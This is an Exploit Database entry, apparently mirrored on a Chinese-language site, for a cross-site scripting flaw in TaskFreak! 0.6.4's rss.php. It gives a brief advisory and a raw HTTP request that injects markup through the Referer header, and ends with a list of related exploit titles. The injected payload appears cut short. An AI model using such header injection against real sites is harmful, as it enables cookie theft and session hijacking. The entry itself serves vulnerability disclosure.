TaskFreak! 0.6.4 – ‘rss.php’ HTTP Referer Header Cross-Site Scripting

Exploit Database
17 阅读

作者： LiquidWorm

日期： 2011-02-12
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/35338/

source: https://www.securityfocus.com/bid/46350/info

TaskFreak! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

TaskFreak! 0.6.4 is vulnerable; other versions may also be affected. 

GET /taskfreak/rss.php HTTP/1.1

Referer: ">Waddup!

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

Host: localhost

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

last Exploits
TaskFreak! 0.6.4 – ‘rss.php’ HTTP Referer Header Cross-Site Scripting的更多信息

PBCS Technology – ‘articlenav.php’ SQL Injection：
Kayako SupportSuite 3.x – Multiple Vulnerabilities：
Gongwalker API Manager 1.1 – Cross-Site Request Forgery：
Tinypug 0.9.5 – Cross-Site Request Forgery (Password Change)：
Zikula Application Framework 1.2.7/1.3 – ‘themename’ Cross-Site Scripting：
WordPress Plugin WP with Spritz 1.0 – Remote File Inclusion：
FluxBB < 1.5.6 - SQL Injection：
PHP Ticket System Beta 1 – Cross-Site Request Forgery：